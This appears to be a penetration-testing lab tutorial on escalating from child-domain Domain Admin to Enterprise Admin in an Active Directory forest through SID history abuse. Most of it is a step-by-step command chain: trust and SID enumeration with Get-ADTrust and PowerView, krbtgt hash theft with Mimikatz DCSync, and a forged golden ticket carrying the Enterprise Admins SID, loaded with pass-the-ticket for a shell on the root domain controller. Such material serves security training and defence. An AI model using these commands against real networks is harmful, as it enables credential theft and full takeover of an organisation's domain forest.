When someone is using a computer network, like in a company or organization, they have an account that gives them access to certain things, like files and programs. This account is identified by a unique number called a Security Identifier (SID). Now, imagine a situation where a person has been using their account in one network, but they need to move to a different network. When they move, a new account is created for them in the new network. This new account has a different SID because it’s in a different network. However, to make sure this person can still access the things they could before in the old network, there’s a feature called SID history. It’s like a record that keeps track of the old SID associated with the person’s original account. This way, even though they have a new account in the new network, they can still get to the things they need in the old network
Now with the help of mimikatz we can manipulate the SID history. For example, if they add their account’s SID to an administrator’s SID history, they can gain administrative powers even though they’re not supposed to.
⇒ So we will be learning about how to abuse
Child ↔ Parent domain trusts relationship for privilege escalation from
Domain Admin ( in child domain ) to
Enterprise Admin in the forest.
⇒ So if we compromise a
child domain and get the
krbtgt hash of a child domain and the
Enterpise Admin SID that is
[ParentDomainSID]-519 . We can then craft a golden ticket using the info with mimikatz and get Enterprise Admin on the parent domain
Refer To the Lab Setup
If you compromise the domain controller of a child domain in a forest, you can compromise its entire parent domain.
To perform this attack after compromising a child domain, we need the following:
- The KRBTGT hash for the child domain
- The SID for the child domain
- The name of a target user in the child domain (does not need to exist!)
- The FQDN of the child domain.
- The SID of the Enterprise Admins group of the root domain.
- With this data collected, the attack can be performed with Mimikatz.
⇒ Tools Required :
- First we have to check the
Trust Relationshipbetween the parent and child Domain, As you can see The Trust is
Bidirectional, When we see that the trust relationship is
BiDirectionalwhich basically means that members can authenticate from one domain to another when they want to access shared resources.
1 2 ### PowerShell cmd-let used to enumerate a target Windows domain's trust relationships. Performed from a Windows-based host. Get-ADTrust -Filer *
Using Powershell Built-in cmdlet
- The SID for the child domain
1 2 ### PowerView tool used to get the SID for a target child domain from a Windows-based host. Get-DomainSID
Also we can use Mimikatz
In order for an attacker to grant themselves Enterprise Admin rights, they can simply add “-519” at the end of the Parent Domain’s Security Identifier (SID). This allows them to trick the system into recognizing their account as a member of the Enterprise Admins group, even though they are not actually part of it.
1 2 3 4 5 kid.crt.local: S-1-5-21-1675317467-1077841801-2270613548 enterprise admin: S-1-5-21-1011749309-1128044670-722997229-519 ; ### ALso we can use PowerView tool used to obtain the Enterprise Admins group's SID from a Windows-based host Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" \| select distinguishedname,objectsid
The KRBTGT hash for the child domain: using DCSync Attack
1 2 3 4 mimikatz # lsadump::dcsync /all /csv ### Uses Mimikatz to obtain the KRBTGT account's NT Hash from a Windows-based host. mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt
At this point, we have gathered the following data points:
- The KRBTGT hash for the child domain:
- The SID for the child domain:
- The name of a target user in the child domain (does not need to exist to create our Golden Ticket!): We’ll choose a fake user: hacker
- The FQDN of the child domain:
- The SID of the Enterprise Admins group of the root domain:
Creating a Golden Ticket with Mimikatz
1 mimikatz: kerberos::golden /user:Administrator /domain:kid.crt.local /sid:S-1-5-21-1675317467-1077841801-2270613548 /krbtgt:f368f5e16475a8248f50614e9ca0a981 /sids:S-1-5-21-1011749309-1128044670-722997229-519
- Load the ticket to get the shell on root domain DC01
1 mimikatz: kerberos::ptt ticket.kirbi
Enter-PSSessionto connect to it remotely